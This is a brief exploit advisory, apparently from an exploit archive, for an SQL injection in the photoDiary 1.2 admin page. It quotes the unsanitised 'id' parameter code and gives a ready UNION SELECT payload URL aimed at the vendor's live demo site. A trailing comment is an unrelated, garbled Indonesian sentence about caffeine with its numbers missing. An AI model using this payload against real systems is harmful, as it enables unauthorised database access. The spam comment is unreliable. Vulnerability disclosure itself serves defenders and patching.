photoDiary 1.2 - SQL Injection Vuln


[o] photoDiary 1.2 SQL Injection Vulnerability

Software : photoDiary version 1.2
Vendor : http://webgriffe.com/
Download : http://code.google.com/p/photodiary/downloads/list
Author : NoGe


[o] Vulnerable file
admin/index.php
$act = $_GET['act'];
.....
if($act=="edit" || $act=="new"){
$id = $_GET['id'];


[o] Exploit
http://localhost/[path]/admin/index.php?act=edit&id=[SQL]


[o] Demo
http://photodiary.webgriffe.com/demo/admin/index.php?act=edit&id=-56%20union%20select%201,2,version(),4--


[o] Note
its funny coz usually you do sql to get admin login but this one you must have admin privs to execute sql. lolz


One Response so far.

  1. Teh mengandung sekitar dan satu ons coklat mengandung sekitar kafein.